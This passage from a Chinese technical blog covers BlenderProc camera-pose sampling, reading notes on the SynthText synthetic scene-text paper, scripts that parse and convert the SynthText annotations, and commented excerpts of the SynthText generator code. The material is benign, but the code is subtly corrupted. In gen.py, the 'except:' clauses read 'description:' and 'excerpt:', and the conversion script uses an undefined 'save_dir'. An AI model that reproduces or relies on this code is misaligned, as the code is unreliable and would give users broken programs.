      • 使用 bproc.object.create_bvh_tree_multi_objects() 函数创建包含所有网格对象的 BVH 树。

    1
    2
    # Init bvh tree containing all mesh objects 包含所有网格对象的初始化 bvh 树
    bvh_tree = bproc.object.create_bvh_tree_multi_objects([o for o in loaded_objects if isinstance(o, bproc.types.MeshObject)])
    1. 循环生成场景:

      • 设置最大尝试次数(tries)和生成的姿势数量(poses)的初始值。

      • 通过循环生成不同的摄像机姿势。

      • 随机采样摄像机高度和旋转角度,并使用这些参数构建世界坐标系到相机坐标系的变换矩阵(cam2world_matrix)。

      • 检查生成的视图是否满足条件:场景覆盖分数高于 0.8,障碍物与相机至少 1 米远,障碍物的平均距离在 2.5 到 3.5 米之间,没有背景可见,并且视图足够有趣。

      • 如果满足条件,则将该摄像机姿势添加到渲染管道中,并增加生成的姿势数量(poses)。

      • 更新尝试次数(tries

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    poses = 0
    tries = 0


    def check_name(name):
    for category_name in ["chair", "sofa", "table", "bed"]:
    if category_name in name.lower():
    return True
    return False


    # filter some objects from the loaded objects, which are later used in calculating an interesting score
    # 从加载的对象中过滤一些对象,这些对象稍后用于计算有趣的分数
    special_objects = [obj.get_cp("category_id") for obj in loaded_objects if check_name(obj.get_name())]

    proximity_checks = {"min": 1.0, "avg": {"min": 2.5, "max": 3.5}, "no_background": True}
    while tries < 10000 and poses < 10:
    # Sample point inside house 房屋内的采样点
    height = np.random.uniform(1.4, 1.8)
    location = point_sampler.sample(height)
    # Sample rotation (fix around X and Y axis) 样品旋转(围绕 X 轴和 Y 轴固定)
    rotation = np.random.uniform([1.2217, 0, 0], [1.338, 0, np.pi * 2])
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation)

    # Check that obstacles are at least 1 meter away from the camera and have an average distance between 2.5 and 3.5 meters and make sure that no background is visible, finally make sure the view is interesting enough
    # 检查障碍物是否距离相机至少 1 米,平均距离在 2.5 到 3.5 米之间,并确保没有可见的背景,最后确保视图足够有趣
    if bproc.camera.scene_coverage_score(cam2world_matrix, special_objects, special_objects_weight=10.0) > 0.8 \
    and bproc.camera.perform_obstacle_in_view_check(cam2world_matrix, proximity_checks, bvh_tree):
    bproc.camera.add_camera_pose(cam2world_matrix)
    poses += 1
    tries += 1
    1. 配置渲染器:

      • 使用 bproc.renderer.enable_normals_output() 启用法线渲染输出。

      • 使用 bproc.renderer.enable_segmentation_output() 启用分割图像输出,并根据类别 ID 进行映射。

    1
    2
    3
    # Also render normals
    bproc.renderer.enable_normals_output()
    bproc.renderer.enable_segmentation_output(map_by=["category_id"])
    1. 渲染整个流程:

      • 使用 bproc.renderer.render() 函数渲染整个管道,包括场景和各种输出。

      • 将渲染结果存储在 data 变量中

    1
    2
    # render the whole pipeline
    data = bproc.renderer.render()
    1. 将数据写入.hdf5文件:
      • 使用 bproc.writer.write_hdf5() 函数将渲染的数据写入一个.hdf5文件。
      • 指定输出路径为 args.output_dir
    1
    2
    # write the data to a .hdf5 container
    bproc.writer.write_hdf5(args.output_dir, data)

    jpg

    好像没什么卵用……

    ]]>
    @@ -5181,7 +5181,7 @@ /posts/Paper-%E9%87%8D%E8%AF%BB-Synthetic%20Data%20for%20Text%20Localisation%20in%20Natural%20Images/ - 资源

    原文

    Abstract

    1. 提出了一个数据集合成引擎,以一种自然的方式将合成文本覆盖到现有的背景图像上,考虑到局部 3D 场景的几何形状。
    2. 一个新的全卷积回归网络 FRCN,解决文本检测问题。在 ICDAR 2013 上获得 84.2% 的 F-Score。

    1 Introduction

    1. 介绍了文本识别的意义,检测管道的性能成为文本识别的新瓶颈:在一个文本识别网络中,正确裁剪单词的识别准确率为 98%,而端到端文本识别 f 值仅为 69%。

    2. 提出了一种新的数据集合成引擎,生成的数据集称为 SynthText in the Wild。

    3. 还提出了一个文本检测模型,但是这玩意太老了估计现在不会用了

    1. 介绍了基于 CNN 的目标检测
    2. 介绍了合成数据集
    3. 介绍了数据增强的方法

    2 Synthetic Text in the Wild

    我们提出的合成引擎:

    1. 真实
    2. 自动化
    3. 快速

    文本生成管道:

    1. 获取合适的文本和图像样本

    2. 根据局部颜色和纹理线索将图像分割成连续的区域

    3. 使用 CNN 获得密集的逐像素深度图

    4. 对每个相邻区域估计一个局部表面法线

    5. 根据区域的颜色选择文本和可选的轮廓的颜色

    6. 使用随机选择的字体渲染文本样本,并根据局部表面方向进行转换

    7. 使用泊松图像编辑将文本融入场景中

    png

    (上,从左到右):
    (1) 无文本实例的 RGB 输入图像。
    (2) 预测密集深度图(越暗的区域越近)。
    (3) 颜色和纹理 gPb-UCM 分段。
    (4) 过滤区域:对适合文本的区域随机上色;那些不合适的保留其原始图像像素。
    (下):四个合成的场景文本图像,在单词级别具有轴对齐的边界框注释。

    2.1. Text and Image Sources

    • 文本从 Newsgroups20 数据集中提取单词、行和段落。

    • 为了增加多样性,从谷歌图像搜索提取了 8000 张图像,人工检查丢弃包含文本的图像。

    2.2. Segmentation and Geometry Estimation

    png

    局部颜色/纹理敏感的位置。
    (左)合成文本数据集的示例图像。请注意,文本被限制在街道上的台阶范围内。
    (右)相比之下,这张图片中的文本位置并没有考虑到局部区域的线索。
    • 在真实图像中,文本往往包含在定义良好的区域(例如一个标志)。我们通过要求文本包含在以统一颜色和纹理为特征的区域中来近似此约束。将 gPb-UCM 轮廓层次的阈值设定为 0.11,从而获得区域。
    • 在自然图像中,文字往往被画在表面的顶部(例如一个标志或一个杯子)。为了在我们的合成数据中近似类似的效果,文本根据局部表面法线进行透视转换。首先使用 CNN 对上述分割的区域预测密集深度图,然后使用 RANSAC 对其拟合平面 facet,从而自动估计法线。
    • 将文本对齐到估计的区域方向,步骤如下:
      • 首先,使用估计的平面法线将图像区域轮廓扭曲为正面平行视图;
      • 然后,在前平行区域拟合一个矩形;
      • 最后,文本与这个矩形的大边(“width”)对齐。
      • 当在同一区域放置多个文本实例时,将检查文本蒙版是否相互碰撞,以避免将它们放在彼此的顶部
    • 并不是所有的分割区域都适合文本放置——区域不应该太小,有一个极端的长宽比,或者表面法线与观看方向正交;所有这些区域都在这个阶段进行过滤。此外,还过滤了纹理过多的区域,其中纹理的程度是通过 RGB 图像中的三阶导数的强度来衡量的。

    • 使用 CNN 来估计深度的替代方法是使用 RGBD 图像数据集,这是一个容易出错的过程。我们更喜欢估计一个不完美的深度图,因为:

      • 它基本上允许使用任何场景类型的背景图像,而不仅仅是那些可用的 RGBD 数据,

      • 因为公开可用的 RGBD 数据集都具有很强的限制。

    2.3. Text Rendering and Image Composition

    • 一旦确定了文本的位置和方向,文本就会被分配一种颜色。文本的调色板是从 IIIT5K 单词数据集中裁剪的单词图像中学习的。每个裁剪的单词图像中的像素使用 K-means 划分为两组,产生颜色对,其中一种颜色近似前景(文本)颜色,另一种颜色近似背景。在渲染新文本时,选择背景颜色与目标图像区域最匹配的颜色对(在 Lab 色彩空间中使用 L2-norm),并使用相应的前景颜色来渲染文本。

    • 大约 20% 的文本实例被随机选择为具有边框。边界颜色被选择为与前景颜色相同,其值通道增加或减少,或者被选择为前景和背景颜色的平均值。

    • 为了保持合成文本图像中的光照梯度,我们使用泊松图像编辑将文本混合到基础图像上。

    3. A Fast Text Detection Network

    3.1. Architecture

    ​ 不看了。

    4. Evaluation

    4.1. Datasets

    • SynthText in the Wild
    • ICDAR Datasets
    • Street View Text

    4.2. Text Localisation Experiments

    ​ 好使。

    4.3. Synthetic Dataset Evaluation

    ​ 我们生成了三个复杂程度越来越高的合成训练数据集:

    1. 文本被放置在图像中的随机位置
    2. 限制于局部颜色和纹理边界
    3. 扭曲视角以匹配局部场景深度(同时也尊重如上(2)中的局部颜色和纹理边界)。

    ​ 数据集的所有其他方面都保持不变——例如文本词典、背景图像、颜色分布。

    4.4. End-to-End Text Spotting

    ​ 在文本识别领域的表现。

    4.5. Timings

    ​ 速度不错!

    5. Conclusion

    ​ 设计的模型在现有的数据集里不好使,但是在合成数据集的帮助下就很好使了。

    A.Appendix

    A.1. Variation in Fonts, Colors and Sizes

    png

    ​ 下面的图片显示了同一文本 “vamos!” 的合成文本渲染。

    ​ 沿着行,文本呈现在大致相同的位置和相同的背景图像上,但字体、颜色和大小不同。

    A.2. Poisson Editing vs. Alpha Blending

    png

    ​ 简单 alpha 混合(下一行)和泊松编辑(上一行)的比较。

    ​ 泊松编辑保留局部照明梯度和纹理细节。

    A.3. SynthText in the Wild

    png

    ​ 这些图像显示了不同字体、颜色、大小的文本实例,带有边框和阴影,背景不同,并根据局部几何形状进行转换,并约束于颜色和文本的局部连续区域。GT 的 BBox 用红色标记。

    A.4. ICDAR 2013 Detections

    png

    ​ ICDAR 2013 数据集上来自 “FCRNall + multi-flit”(上行)和来自 Jaderberg 等人(下行)的检测示例。精度,召回率和 F 测量值 (P / R / F) 显示在每个图像的顶部。

    A.5. Street View Text (SVT) Detections

    png

    ​ 在“FCRNall + multi-flit”街景文本 (SVT) 数据集上的检测示例(上一行)和来自 Jaderberg 等人的检测示例(下一行)。

    ​ 精度,召回率和 F 测量值 (P / R / F) 在每张图像的顶部表示:这两种方法在这些图像上的精度都为 1 (除了一个由于缺少地基真值注释的情况)。

    数据集解析

    ​ 从 Synthetic Data for Text Localisation in Natural Images - Academic Torrents 下载 SynthText.zip,解压之:

    png

    ​ 其中每一个文件夹里包含一个场景,里面存放着若干图片,gt.mat 是这些图片的注释。

    ​ 关于 gt.mat 里的解析:SynthText文本数据详细解析_synthtext数据集_Mr.Q的博客-CSDN博客

    ​ 使用 python 读取 gt.mat 文件:

    import scipy.io as sio

    # 读取MAT文件
    data = sio.loadmat(r'D:\dataset\SynthText\SynthText\gt.mat')

    ​ 包含如下属性:

    • imnames:图片路径
    • txt:文本
    • wordBB:单词级标注框
    • charBB:字符级标注框
    len(data['imnames'][0]), len(data['txt'][0]), len(data['wordBB'][0]), len(data['charBB'][0])
    (858750, 858750, 858750, 858750)

    数据集可视化:

    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 92

    file_dir = r'D:/dataset/SynthText/SynthText/'

    image_path = os.path.join(file_dir, data['imnames'][0][index][0])

    image_origin = cv2.imread(image_path)
    image_bbox = image_origin.copy()
    image_cbox = image_origin.copy()
    height, width, _ = image_origin.shape


    txt = []
    for element in list(data['txt'][0][index]):
    txt.extend(element.split())

    if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['wordBB'][0][index][0][0])): # bbox
    x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
    y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[i]

    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))
    else:
    x = [int(num) for num in data['wordBB'][0][index][0]]
    y = [int(num) for num in data['wordBB'][0][index][1]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[0]

    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    if isinstance(data['charBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['charBB'][0][index][0][0])): # cbox
    x = [int(num) for num in data['charBB'][0][index][0][:, i]]
    y = [int(num) for num in data['charBB'][0][index][1][:, i]]
    points = np.array([x, y], np.int32).T

    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    else:
    x = [int(num) for num in data['charBB'][0][index][0]]
    y = [int(num) for num in data['charBB'][0][index][1]]
    points = np.array([x, y], np.int32).T

    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin: ' + data['imnames'][0][index][0])

    axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('bbox')

    axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
    axes[2].axis('off')
    axes[2].set_title('cbox')

    plt.tight_layout()
    plt.show()

    png

    转换成 MindOCR 可读的 TotalText 形式

    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np
    import shutil
    from tqdm import tqdm

    file_dir = r'D:/dataset/SynthText/SynthText/'
    save_image_dir = r'D:/dataset/SynthText/SynthText/images'
    save_label_dir = r'D:/dataset/SynthText/SynthText/Txts'

    for index in tqdm(range(858750)):
    image_path = os.path.join(file_dir, data['imnames'][0][index][0])
    shutil.copy(image_path, os.path.join(save_image_dir, 'img' + str(index) + '.jpg'))

    string = ""
    txt = []
    for element in list(data['txt'][0][index]):
    txt.extend(element.split())

    if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['wordBB'][0][index][0][0])): # bbox
    x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
    y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[i]
    else:
    x = [int(num) for num in data['wordBB'][0][index][0]]
    y = [int(num) for num in data['wordBB'][0][index][1]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[0]

    string += 'x: [['
    string += ' '.join(map(str, x))
    string += ']], y: [['
    string += ' '.join(map(str, y))
    string += "]], ornt: [u'h"
    string += "'], transcriptions: [u'"
    string += transcriptions
    string += "']\n"

    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
    file.write(string)

    代码

    ​ 从 ankush-me/SynthText at python3 (github.com) 获取代码,在 Wsl2 下跑,装环境下见招拆招,总能跑的。

    ​ 生成图片:

    python gen.py --viz

    ​ 可视化结果:

    python visualize_results.py

    png

    image name        :  hiking_125.jpg_0
    ** no. of chars : 69
    ** no. of words : 15
    ** text : ['>>Potvin' 'someone\n wrong \ngetting' 'cloud' 'do with' 'Calgary\nfinal'
    'Re:' 'I have' 'a stud\nMorgan']

    读代码(太多了,挑一点看吧)

    gen.py

    import numpy as np
    import h5py # 用于读写 HDF5 文件格式的数据
    import os, sys, traceback # 用于进行文件和系统操作以及处理异常
    import os.path as osp # 用于处理文件路径
    from synthgen import * # 从 synthgen 模块导入所有内容。synthgen 模块包含了生成合成文本图像的相关函数和类
    from common import * # 从 common 模块导入所有内容。common 模块包含了一些通用的函数和常量。
    import wget, tarfile # 导入 wget 和 tarfile 模块,用于下载和解压文件。


    # Define some configuration variables:
    # 要用于生成的图像数量(-1表示使用所有可用的图像)。
    NUM_IMG = -1 # no. of images to use for generation (-1 to use all available):
    # 每张图像使用的实例数量。
    INSTANCE_PER_IMAGE = 1 # no. of times to use the same image
    # 每张图像的最大处理时间(单位:秒)。
    SECS_PER_IMG = 5 # max time per image in seconds

    # path to the data-file, containing image, depth and segmentation:
    DATA_PATH = 'data' # 数据文件的路径
    DB_FNAME = osp.join(DATA_PATH,'dset.h5') # 数据库文件的完整路径,由数据路径和数据库文件名组合而成。
    # url of the data (google-drive public file):
    DATA_URL = 'http://www.robots.ox.ac.uk/~ankush/data.tar.gz' # 数据的下载链接。
    OUT_FILE = 'results/SynthText.h5' # 输出结果的文件路径。

    def get_data():
    """
    Download the image,depth and segmentation data:
    Returns, the h5 database.
    """
    # 检查存储数据的 h5 文件是否存在,如果不存在则执行数据下载和解压的操作。
    if not osp.exists(DB_FNAME):
    try:
    # 打印提示信息,显示数据下载链接和文件大小。
    colorprint(Color.BLUE,'\tdownloading data (56 M) from: '+DATA_URL,bold=True)
    print()
    sys.stdout.flush()
    # 使用 wget.download() 函数下载数据文件,并指定下载得到的文件名为 "data.tar.gz"。
    out_fname = 'data.tar.gz'
    wget.download(DATA_URL,out=out_fname)
    # 打开 tar 文件并解压文件内容。
    tar = tarfile.open(out_fname)
    tar.extractall()
    # 关闭 tar 文件并删除压缩文件 "data.tar.gz"。
    tar.close()
    os.remove(out_fname)
    # 打印提示信息,显示数据保存的路径。
    colorprint(Color.BLUE,'\n\tdata saved at:'+DB_FNAME,bold=True)
    sys.stdout.flush()
    description: # 下载出现异常,则打印数据未找到的错误信息,并退出程序。
    print (colorize(Color.RED,'Data not found and have problems downloading.',bold=True))
    sys.stdout.flush()
    sys.exit(-1)
    # open the h5 file and return: 打开 h5 文件并以只读方式返回数据库对象。
    return h5py.File(DB_FNAME,'r')


    def add_res_to_db(imgname,res,db):
    """
    将合成的文本图像实例及其相关元数据添加到数据集中。
    Add the synthetically generated text image instance
    and other metadata to the dataset.
    :param imgname: 图像名称
    :param res: 生成的合成文本图像实例
    :param db: 数据库对象
    """
    ninstance = len(res) # 计算生成的合成文本图像实例的数量
    for i in range(ninstance): # 遍历每个实例
    # 首先创建一个数据集(dataset)并将合成图像存储在其中,数据集名称由图像名称和实例索引组成(dname)
    dname = "%s_%d"%(imgname, i)
    db['data'].create_dataset(dname,data=res[i]['img'])
    # 将字符边界框(charBB)和单词边界框(wordBB)作为属性添加到数据集中
    db['data'][dname].attrs['charBB'] = res[i]['charBB']
    db['data'][dname].attrs['wordBB'] = res[i]['wordBB']
    # db['data'][dname].attrs['txt'] = res[i]['txt']
    L = res[i]['txt']
    L = [n.encode("ascii", "ignore") for n in L]
    db['data'][dname].attrs['txt'] = L
    # 返回更新后的数据库对象。


    def main(viz=False):
    # open databases: 打开数据集
    print (colorize(Color.BLUE,'getting data..',bold=True))
    db = get_data()
    print (colorize(Color.BLUE,'\t-> done',bold=True))

    # open the output h5 file: 打开输出 HDF5 文件
    out_db = h5py.File(OUT_FILE,'w')
    out_db.create_group('/data')
    print (colorize(Color.GREEN,'Storing the output in: '+OUT_FILE, bold=True))

    # get the names of the image files in the dataset:
    # 获取数据集中的图像名称列表
    imnames = sorted(db['image'].keys())
    N = len(imnames)
    global NUM_IMG
    if NUM_IMG < 0: # -1 表示使用所有可用的图像
    NUM_IMG = N
    start_idx,end_idx = 0,min(NUM_IMG, N) # 设置开始和结束索引

    RV3 = RendererV3(DATA_PATH,max_time=SECS_PER_IMG)
    for i in range(start_idx,end_idx): # 循环遍历每个图像
    imname = imnames[i]
    try:
    # get the image: 获取图像
    img = Image.fromarray(db['image'][imname][:])
    # get the pre-computed depth: 获取深度信息
    # 这里有 2 个深度估计值(表示为 2 个“通道”),这里我们使用第二个(在某些情况下,使用另一个可能很有用):
    # there are 2 estimates of depth (represented as 2 "channels")
    # here we are using the second one (in some cases it might be
    # useful to use the other one):
    depth = db['depth'][imname][:].T
    depth = depth[:,:,1]
    # get segmentation: 获取分割信息
    seg = db['seg'][imname][:].astype('float32')
    area = db['seg'][imname].attrs['area']
    label = db['seg'][imname].attrs['label']

    # re-size uniformly: 缩放到相同的大小
    sz = depth.shape[:2][::-1]
    img = np.array(img.resize(sz,Image.ANTIALIAS))
    seg = np.array(Image.fromarray(seg).resize(sz,Image.NEAREST))

    print (colorize(Color.RED,'%d of %d'%(i,end_idx-1), bold=True))
    # 使用 RendererV3 生成器,将文本渲染到每个图像中,并将合成文本图像及其相关元数据添加到输出数据库中。
    res = RV3.render_text(img,depth,seg,area,label,
    ninstance=INSTANCE_PER_IMAGE,viz=viz)
    if len(res) > 0:
    # non-empty : successful in placing text: 成功放置文字
    add_res_to_db(imname,res,out_db)
    # visualize the output:
    if viz: # 可视化输出结果
    if 'q' in input(colorize(Color.RED,'continue? (enter to continue, q to exit): ',True)):
    break
    excerpt:
    traceback.print_exc()
    print (colorize(Color.GREEN,'>>>> CONTINUING....', bold=True))
    continue
    db.close()
    out_db.close()


    if __name__=='__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Genereate Synthetic Scene-Text Images')
    parser.add_argument('--viz',action='store_true',dest='viz',default=False,help='flag for turning on visualizations')
    args = parser.parse_args()
    main(args.viz)

    synthgen.py

    Main script for synthetic text rendering.

    from __future__ import division
    import copy
    import cv2
    import h5py
    from PIL import Image
    import numpy as np
    #import mayavi.mlab as mym
    import matplotlib.pyplot as plt
    import os.path as osp
    import scipy.ndimage as sim
    import scipy.spatial.distance as ssd
    import synth_utils as su
    import text_utils as tu
    from colorize3_poisson import Colorize
    from common import *
    import traceback, itertools

    class TextRegions()

    class TextRegions(object):
    """
    Get region from segmentation which are good for placing
    text.
    """
    # 只有当区域的宽度大于等于 minWidth 并且高度大于等于 minHeight 才会被认为是可行的文本区域。
    minWidth = 30 #px
    minHeight = 30 #px
    # 只有当区域的宽度与高度之比介于 minAspect 和 maxAspect 之间时,才会被认为是可行的文本区域
    minAspect = 0.3 # w > 0.3*h
    maxAspect = 7
    # 只有当区域的像素数大于或等于 minArea 时,才会被认为是可行的文本区域
    minArea = 100 # number of pix
    # 只有当区域的像素数大于或等于 minArea 时,才会被认为是可行的文本区域
    pArea = 0.60 # area_obj/area_minrect >= 0.6

    # RANSAC planar fitting params:
    # RANSAC 平面拟合的参数:
    # 距离阈值。如果一个点到拟合平面的距离小于 dist_thresh,则该点被认为是内点。
    dist_thresh = 0.10 # m
    # 内点数量的最小值。如果拟合平面的内点数量小于 num_inlier,则拟合失败。
    num_inlier = 90
    # RANSAC 拟合的迭代次数。每一次迭代都会随机选择一些点进行平面拟合。
    ransac_fit_trials = 100
    # 平面法向量的最小 z 分量。如果平面法向量的 z 分量低于 min_z_projection,则该平面被认为是垂直于摄像机视角的,因此不能用作文本区域。
    min_z_projection = 0.25
    # 用于筛选旋转后的文本区域的最小宽度,只有当它大于 minW 时才会被保留。
    minW = 20

    @staticmethod
    def filter_rectified(mask):
    """
    用于过滤旋转后的文本区域,只有当其宽度和高度都不小于 TextRegions.minW 时才会被保留。
    接收一个二值化的图像作为输入,其中 "1" 表示区域内的像素点,"0" 则表示背景。
    mask : 1 where "ON", 0 where "OFF"
    """
    # 计算出区域在垂直和水平方向上的投影,然后取其中位数。
    wx = np.median(np.sum(mask,axis=0))
    wy = np.median(np.sum(mask,axis=1))
    # 如果两个中位数都大于等于 TextRegions.minW,则返回 True,否则返回 False。
    return wx>TextRegions.minW and wy>TextRegions.minW

    @staticmethod
    def get_hw(pt,return_rot=False):
    # 用于计算旋转矫正后的文本区域的宽度和高度
    pt = pt.copy()
    # 使用 unrotate2d 方法进行旋转校正。这个方法通过计算区域的主轴角度,然后将区域旋转回水平方向。
    R = su.unrotate2d(pt)
    # 计算区域坐标的中位数 mu,并将每个点减去中位数,以便将区域的中心移动到原点。
    mu = np.median(pt,axis=0)
    # 函数应用旋转矩阵 R,将区域进行旋转,并再次将中心移回原来的位置。
    pt = (pt-mu[None,:]).dot(R.T) + mu[None,:]
    # 计算旋转矫正后的区域的宽度和高度,分别等于区域坐标的最大值减去最小值。
    h,w = np.max(pt,axis=0) - np.min(pt,axis=0)
    if return_rot:
    # 如果 return_rot 参数设置为 True,则函数还会返回旋转矩阵 R。
    return h,w,R
    return h,w

    @staticmethod
    def filter(seg,area,label):
    """
    Apply the filter.
    The final list is ranked by area.
    应用过滤器对文本区域进行筛选和排序。
    :seg: 分割图像
    :area: 区域面积
    :label: 区域标签
    """
    # 根据 TextRegions.minArea 将小于最小面积阈值的区域排除,并更新 good 和 area 的值
    good = label[area > TextRegions.minArea]
    area = area[area > TextRegions.minArea]
    filt,R = [],[]
    for idx,i in enumerate(good):
    # 对每个符合要求的区域进行处理。函数首先根据区域的标签 i 生成相应的二值掩膜 mask
    mask = seg==i
    # 使用 np.where 函数获取掩膜上非零像素的坐标,并将其保存到 xs 和 ys
    xs,ys = np.where(mask)
    # 将坐标转换为浮点型的数组 coords
    coords = np.c_[xs,ys].astype('float32')
    # 利用 cv2.minAreaRect 函数计算出最小外接矩形 rect
    rect = cv2.minAreaRect(coords)
    #box = np.array(cv2.cv.BoxPoints(rect))
    # 通过 cv2.boxPoints 函数从矩形中获取四个角点的坐标,保存在 box 中
    box = np.array(cv2.boxPoints(rect))
    # 调用 TextRegions.get_hw 方法获取旋转矫正后的区域的宽度 w、高度 h 和旋转矩阵 rot
    h,w,rot = TextRegions.get_hw(box,return_rot=True)
    # 依次判断以下条件:
    # h > TextRegions.minHeight:区域高度是否大于最小高度阈值;
    # w > TextRegions.minWidth:区域宽度是否大于最小宽度阈值;
    # TextRegions.minAspect < w/h < TextRegions.maxAspect:区域宽高比是否在允许的范围内;
    # area[idx]/w*h > TextRegions.pArea:经过旋转后的区域面积是否大于面积阈值
    # 上述条件全部满足,则将标记为 True,否则标记为 False
    f = (h > TextRegions.minHeight
    and w > TextRegions.minWidth
    and TextRegions.minAspect < w/h < TextRegions.maxAspect
    and area[idx]/w*h > TextRegions.pArea)
    # 将结果保存到列表 filt 中
    filt.append(f)
    # 将旋转矩阵 rot 保存到列表 R 中
    R.append(rot)

    # filter bad regions:
    # 根据 filt 的结果对不符合条件的区域进行过滤
    filt = np.array(filt)
    # 更新 area 和 R
    area = area[filt]
    R = [R[i] for i in range(len(R)) if filt[i]]

    # sort the regions based on areas:
    # 根据区域面积的降序对区域进行排序,并更新 good 和 R
    aidx = np.argsort(-area)
    good = good[filt][aidx]
    R = [R[i] for i in aidx]
    # 返回一个字典 filter_info,包含了筛选后的文本区域的标签、旋转矩阵和面积信息
    filter_info = {'label':good, 'rot':R, 'area': area[aidx]}
    return filter_info

    @staticmethod
    def sample_grid_neighbours(mask,nsample,step=3):
    """
    Given a HxW binary mask, sample 4 neighbours on the grid,
    in the cardinal directions, STEP pixels away.
    :mask: H * W 的二值掩膜
    :nsample: 采样数量
    :step: 采样间隔
    """
    if 2*step >= min(mask.shape[:2]):
    return #None
    # 通过 np.where 函数找到二值掩膜中非零像素的坐标,并将其保存在 y_m 和 x_m 中
    y_m,x_m = np.where(mask)
    # 创建一个和 mask 相同大小的全零矩阵 mask_idx,用于存储每个非零像素的索引
    mask_idx = np.zeros_like(mask,'int32')
    for i in range(len(y_m)):
    mask_idx[y_m[i],x_m[i]] = i
    # 根据给定的步长 step,分别计算出向 x 正方向和负方向、y 正方向和负方向的邻域像素坐标,并保存在 xp、xn、yp 和 yn 中
    xp,xn = np.zeros_like(mask), np.zeros_like(mask)
    yp,yn = np.zeros_like(mask), np.zeros_like(mask)
    xp[:,:-2*step] = mask[:,2*step:]
    xn[:,2*step:] = mask[:,:-2*step]
    yp[:-2*step,:] = mask[2*step:,:]
    yn[2*step:,:] = mask[:-2*step,:]
    # 通过逻辑与运算 &,获取在四个方向上都存在的有效邻域像素,并保存在 valid 中
    valid = mask&xp&xn&yp&yn

    # 通过 np.where 函数找到 valid 中非零像素的坐标,并将其保存在 ys 和 xs 中
    ys,xs = np.where(valid)
    # 如果没有找到任何有效的像素,即 N == 0,则返回 None
    N = len(ys)
    if N==0: #no valid pixels in mask:
    return #None
    # 找到了有效的像素,函数会选择 nsample 个像素进行采样,其中 nsample 取值不超过 N
    nsample = min(nsample,N)
    # 调用 np.random.choice 函数在坐标索引 idx 中选取 nsample 个不重复的索引
    idx = np.random.choice(N,nsample,replace=False)
    # 根据选取的索引,生成邻域矩阵 sample_idx,其形状为 (1+4)x2xNsample(2 表示 y 和 x 坐标)
    # generate neighborhood matrix:
    # (1+4)x2xNsample (2 for y,x)
    xs,ys = xs[idx],ys[idx]
    s = step
    X = np.transpose(np.c_[xs,xs+s,xs+s,xs-s,xs-s][:,:,None],(1,2,0))
    Y = np.transpose(np.c_[ys,ys+s,ys-s,ys+s,ys-s][:,:,None],(1,2,0))
    sample_idx = np.concatenate([Y,X],axis=1)
    # 函数将邻域矩阵转换为邻域索引矩阵 mask_nn_idx,其形状为 5xNsample。
    mask_nn_idx = np.zeros((5,sample_idx.shape[-1]),'int32')
    # 对于每个选取的邻域像素,通过查找 mask_idx 对应位置的值,将相应的索引存储到 mask_nn_idx 中
    for i in range(sample_idx.shape[-1]):
    mask_nn_idx[:,i] = mask_idx[sample_idx[:,:,i][:,0],sample_idx[:,:,i][:,1]]
    # 函数最终返回邻域索引矩阵 mask_nn_idx
    return mask_nn_idx

    @staticmethod
    def filter_depth(xyz,seg,regions):
    """
    这段代码实现了根据给定的点云数据、分割结果和区域信息,对每个区域进行深度滤波的函数
    :xyz: 点云坐标数据
    :seg: 分割结果
    :regions: 区域信息
    """
    # 创建了一个空字典 plane_info,用于保存满足条件的平面信息
    plane_info = {'label':[],
    'coeff':[],
    'support':[],
    'rot':[],
    'area':[]}
    for idx,l in enumerate(regions['label']):
    # 对于 regions 中的每个区域,利用区域标签 l 和分割结果 seg,生成对应的二值掩膜 mask
    mask = seg==l
    # 调用 TextRegions.sample_grid_neighbours 函数,以 mask 为输入,使用 RANSAC 方法进行平面拟合,获取采样点集 pt_sample
    pt_sample = TextRegions.sample_grid_neighbours(mask,TextRegions.ransac_fit_trials,step=3)
    # 如果没有足够的点进行 RANSAC 拟合,则跳过该区域的处理
    if pt_sample is None:
    continue #not enough points for RANSAC
    # get-depths
